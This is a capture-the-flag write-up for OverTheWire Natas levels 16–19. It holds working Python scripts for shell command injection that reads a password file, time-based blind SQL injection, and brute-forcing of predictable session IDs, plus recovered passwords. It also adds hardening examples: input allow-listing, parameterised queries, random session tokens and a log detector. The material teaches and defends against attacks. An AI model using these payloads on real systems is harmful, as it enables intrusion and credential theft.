Wargames NATAS (16-19) problem solving essays
2022-07-24 08:26:00 【renu08】
Natas Level 15 → Level 16
Tips: In shell scripts, `$()` performs command substitution even inside double quotes, so one grep can be nested inside another, for example:
grep -i "$(grep ^pwd password.txt)wrong" dictionary.txt
The shell first runs the inner grep in a subshell, searching password.txt for a line beginning with pwd. If nothing matches, the substitution expands to nothing and the outer command is effectively `grep -i wrong dictionary.txt`, which finds "wrong" in dictionary.txt and prints it. Conversely, if the inner grep does match, the outer grep searches for "<match>wrong", which is not in the dictionary, so it prints nothing. This difference in output lets us brute-force the password one character at a time. I again use Python; the code is as follows:
```python
import urllib.request
import urllib.parse
import re

url = 'http://natas16.natas.labs.overthewire.org'
headers = {
    'Host': 'natas16.natas.labs.overthewire.org',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Authorization': 'Basic bmF0YXMxNjpXYUlIRWFjajYzd25OSUJST0hlcWkzcDl0MG01bmhtaA==',
    'Connection': 'keep-alive',
    'Referer': 'http://natas16.natas.labs.overthewire.org/?needle=accounts&submit=Search',
    'Cookie': '__utma=176859643.1665848136.1639378791.1640070651.1640436097.15; __utmz=176859643.1639378791.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=176859643',
    'Upgrade-Insecure-Requests': '1'
}
dic = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
n1 = '$(grep ^'
n2 = ' /etc/natas_webpass/natas17)accounts'
length = len('AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')  # Natas passwords are 32 characters long
pattern = re.compile(r'\naccounts')  # "accounts" echoed back means the inner grep matched nothing
pwd = ''
values = {
    'needle': '',
    'submit': 'Search'
}
for i in range(length):
    for ch in dic:
        needle = n1 + pwd + ch + n2
        print(needle)
        values['needle'] = needle
        data = urllib.parse.urlencode(values)
        r = url + '?' + data
        req = urllib.request.Request(url=r, headers=headers, method='GET')
        response = urllib.request.urlopen(req)
        html = response.read().decode('ascii')
        if not pattern.search(html):
            # no echo: the inner grep matched, so ch is the next character
            pwd += ch
            break
print(pwd)
```
username: natas17
password: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
Passed!
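The root cause of this level is that the search term is spliced into a shell command string, so `$()` is interpreted by the shell. As an added example (not code from the page or from the Natas project), the following shows the fix a developer would apply: pass the term to grep as a single argv element with no shell involved, and allow-list it against the same alphanumeric set the level's own alphabet uses. The dictionary file, its contents and the `demo()` helper are constructed for the example; the pure-Python fallback only exists so the block runs on a host without grep.

```python
import os
import re
import shutil
import subprocess
import tempfile

# Allow-list: letters and digits only. Quotes, '$', backticks, ';' and '|' never pass.
NEEDLE_RE = re.compile(r"[A-Za-z0-9]{1,64}")


def validate_needle(needle):
    """Return True only for a plain alphanumeric search term."""
    return NEEDLE_RE.fullmatch(needle) is not None


def search_dictionary(needle, dictionary_path):
    """Case-insensitive dictionary search with the needle passed as one argv element.

    With no shell in the path, a term such as '$(grep ^a /etc/natas_webpass/natas17)accounts'
    would reach grep as a literal string and match nothing; the allow-list rejects it earlier.
    """
    if not validate_needle(needle):
        raise ValueError("search term must be alphanumeric")
    if shutil.which("grep") is not None:
        # '--' ends option parsing so the needle can never be read as a grep flag.
        proc = subprocess.run(
            ["grep", "-i", "--", needle, dictionary_path],
            capture_output=True, text=True, check=False,
        )
        return proc.stdout.splitlines()
    # Fallback (assumption: small file) for hosts without grep; same semantics in Python.
    with open(dictionary_path, encoding="utf-8") as fh:
        return [line.rstrip("\n") for line in fh if needle.lower() in line.lower()]


def demo():
    """Build a constructed dictionary, run a benign search and the page's injected term."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("accounts\nwrong\naccount\n")  # constructed dictionary content
        path = fh.name
    try:
        hits = search_dictionary("accounts", path)
        try:
            search_dictionary("$(grep ^a /etc/natas_webpass/natas17)accounts", path)
            rejected = False
        except ValueError:
            rejected = True
    finally:
        os.unlink(path)
    return hits, rejected


if __name__ == "__main__":
    print(demo())  # (['accounts'], True)
```

The allow-list is the primary control; the argv form is defence in depth for the case where a looser character set is needed later.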
Natas Level 16 → Level 17
Tips: Opening the source code and comparing it with the previous level shows that the output has been commented out. For MySQL injection there are generally three directions:
- Echo-based injection: the server returns some information in the response
- Time-based blind injection: the server returns no information, but a carefully constructed SQL statement lets you infer information from the server's response time
- Error-based injection (omitted here)
The previous level used echo-based injection; this level requires time-based blind injection.
I wrote a Python script; the code is as follows:
```python
import requests

url = 'http://natas17.natas.labs.overthewire.org/index.php'
headers = {
    'Host': 'natas17.natas.labs.overthewire.org',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://natas17.natas.labs.overthewire.org',
    'Authorization': 'Basic bmF0YXMxNzo4UHMzSDBHV2JuNXJkOVM3R21BZGdRTmRraFBrcTljdw==',
    'Connection': 'keep-alive',
    'Referer': 'http://natas17.natas.labs.overthewire.org/',
    'Cookie': '__utma=176859643.1665848136.1639378791.1640436097.1640518734.16; __utmz=176859643.1639378791.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=176859643',
    'Upgrade-Insecure-Requests': '1'
}
dic = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
n1 = 'natas18" AND BINARY password LIKE "'
n2 = '%" AND SLEEP(10)#'
length = len('AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')  # Natas passwords are 32 characters long
pwd = ''
for i in range(length):
    for ch in dic:
        name = n1 + pwd + ch + n2
        print(name)
        data = {'username': name}
        res = requests.post(url, data=data, headers=headers)
        elapsed = res.elapsed.total_seconds()
        print(elapsed)
        if elapsed > 10:
            # SLEEP(10) ran, so the prefix pwd + ch is correct
            pwd += ch
            break
print(pwd)
```
username: natas18
password: xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP
Note: because of network latency, the delay should be set fairly long. I used 10 seconds here, SLEEP(10); otherwise the result comes out wrong.
Passed!
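The timing channel only exists because the username is pasted into the SQL text, so the `"` in the payload closes the string literal and everything after it is parsed as SQL. As an added example (not the page's code and not the Natas source), the block below puts the vulnerable way of assembling the statement next to the parameterised form, using an in-memory SQLite table as a stand-in for the challenge's MySQL database. The table, the placeholder password and the function names are constructed for the example; the `BINARY` and `SLEEP()` functions in the page's payload are MySQL-specific, which is irrelevant to the bound-parameter version because the value is never parsed as SQL at all.

```python
import sqlite3

# The exact payload shape the page's script sends, with a fixed guess of 'x'.
PAGE_PAYLOAD = 'natas18" AND BINARY password LIKE "x%" AND SLEEP(10)#'


def setup_db():
    """In-memory stand-in for the challenge's users table (constructed placeholder password)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("natas18", "CONSTRUCTED-PLACEHOLDER"))
    conn.commit()
    return conn


def build_query_unsafe(username):
    """The vulnerable pattern: input spliced into the statement text.

    Returned as a string and never executed here; it shows that the payload's first
    quote terminates the literal and the remainder becomes additional SQL conditions.
    """
    return f'SELECT * FROM users WHERE username="{username}"'


def user_exists(conn, username):
    """Hardened form: the driver binds the username as a value, so it can only be compared
    against the column. The same payload is now just a username nobody has."""
    row = conn.execute("SELECT 1 FROM users WHERE username = ?", (username,)).fetchone()
    return row is not None


if __name__ == "__main__":
    db = setup_db()
    print(build_query_unsafe(PAGE_PAYLOAD))
    print(user_exists(db, "natas18"), user_exists(db, PAGE_PAYLOAD))  # True False
```

A statement timeout on the database side (MySQL's `max_execution_time` for SELECTs) would additionally cap how long any single query can stall, but it is a mitigation for the symptom; binding parameters removes the injection itself.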
Natas Level 17 → Level 18
Tips: Reading the source code shows that the password is only revealed when logged in as the administrator. The authentication state is stored in the $_SESSION variable, so we can log in as the administrator through session hijacking, which requires obtaining the administrator's session_id. Capturing the request with Burp Suite shows a PHPSESSID field in the cookies; this is what the server uses to identify the user, so we only need the administrator's PHPSESSID to log in as the administrator.
The PHPSESSID value turns out to be a plain number, and the source code contains $maxid=640, meaning the session_id is at most 640. So we brute-force it directly, with the following Python code:
```python
import requests
import re

url = 'http://natas18.natas.labs.overthewire.org/'
headers = {
    'Host': 'natas18.natas.labs.overthewire.org',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Authorization': 'Basic bmF0YXMxODp4dktJcURqeTRPUHY3d0NSZ0RsbWowcEZzQ3NEamhkUA==',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1'
}
pattern = re.compile(r'You are logged in as a regular user')
for i in range(640):  # $maxid=640 in the source code
    val = str(i)
    cookies = {'PHPSESSID': val}
    res = requests.get(url, headers=headers, cookies=cookies)
    if pattern.search(res.content.decode('ascii')):
        print(val)
    else:
        # no "regular user" text: this session belongs to the administrator
        print('session_id=' + val)
        print(res.content.decode('ascii'))
        break
```
Running the script finds the administrator's session_id=119, and we move on to the next level.
username: natas19
password: 4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs
Passed!
Natas Level 18 → Level 19
Tips: The source code of this level is the same as the previous one, but here the PHPSESSID is no longer a plain number. Trying a few times reveals the pattern: the first 7 characters of the PHPSESSID are digits of the form 3xxxxxx, so we start brute-forcing from 3000000, and the trailing characters are fixed, 'd61646d696e'. Then it is the same direct brute force as above. It takes a while, so have a cup of coffee. The code is as follows:
```python
import requests
import re

url = 'http://natas19.natas.labs.overthewire.org/index.php'
headers = {
    'Host': 'natas19.natas.labs.overthewire.org',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Authorization': 'Basic bmF0YXMxOTo0SXdJcmVrY3VabEE5T3NqT2tvVXR3VTZsaG9rQ1BZcw==',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1'
}
pattern = re.compile(r'You are an admin')
s_val = 3000000  # the first 7 characters of PHPSESSID are digits; the admin's turn out to be 3238312
while True:
    session_id = str(s_val) + 'd61646d696e'  # the trailing characters are fixed
    print('PHPSESSID: ' + session_id)
    cookies = {'PHPSESSID': session_id}
    res = requests.get(url, headers=headers, cookies=cookies)
    if pattern.search(res.content.decode('ascii')):
        print('session_id=' + session_id)
        print(res.content.decode('ascii'))
        break
    s_val += 1
```
After running the script, session_id=3238312d61646d696e turns out to be the administrator's session_id.
username: natas20
password: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF
Passed!
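Levels 18 and 19 share one weakness: the session identifier is derived from the user record instead of being random, so it can be enumerated. The cookie the Level 19 script found is hex-encoded ASCII, and decoding it shows where the fixed tail 'd61646d696e' comes from: `3238312d61646d696e` is `281-admin`. The following added example (not the page's code and not the Natas source) decodes that value, reproduces the predictable scheme as the "before", shows the random replacement a framework should use, and runs a simple enumeration detector over constructed access-log lines. The log format, the client addresses and the threshold of 20 distinct cookies are assumptions made for the example.

```python
import re
import secrets
from collections import defaultdict


def decode_hex_session_id(session_id):
    """The Level 19 cookie is hex text; the value found on the page decodes to '281-admin',
    which is why its tail 'd61646d696e' ('-admin') never changes across guesses."""
    return bytes.fromhex(session_id).decode("ascii")


def weak_session_id(user_id, username):
    """The predictable scheme the decoded cookie reveals: hex('<id>-<name>').
    The only unknown is the user id, which is the small space both scripts search."""
    return f"{user_id}-{username}".encode("ascii").hex()


def new_session_id():
    """Hardened replacement: 128 random bits from the OS CSPRNG with no user data in them,
    so there is no counter to walk (Level 18) and no structured prefix to guess (Level 19)."""
    return secrets.token_hex(16)


# Constructed log format: '<client> "<request>" PHPSESSID=<value>'
COOKIE_RE = re.compile(r'^(\S+) .*PHPSESSID=([0-9a-fA-F]+)')


def find_session_enumerators(log_lines, threshold=20):
    """Server-side detection: a client presenting many distinct session cookies is trying
    identifiers rather than using one. Returns the offending client addresses."""
    distinct = defaultdict(set)
    for line in log_lines:
        m = COOKIE_RE.match(line)
        if m:
            distinct[m.group(1)].add(m.group(2))
    return sorted(ip for ip, ids in distinct.items() if len(ids) >= threshold)


# Constructed sample: one client walks 30 numeric ids, another reuses a single cookie.
SAMPLE_LOG = [f'198.51.100.7 "GET /index.php" PHPSESSID={i}' for i in range(30)] + [
    '203.0.113.12 "GET /index.php" PHPSESSID=abc123',
    '203.0.113.12 "GET /index.php" PHPSESSID=abc123',
]


if __name__ == "__main__":
    print(decode_hex_session_id("3238312d61646d696e"))  # 281-admin
    print(weak_session_id(281, "admin"))                # 3238312d61646d696e
    print(new_session_id())
    print(find_session_enumerators(SAMPLE_LOG))         # ['198.51.100.7']
```

In practice the detector would be keyed on a time window and fed from the web server's access log rather than a list; the threshold of 20 distinct cookies from one client is an assumption to tune, since legitimate users produce one or a handful of session ids per session.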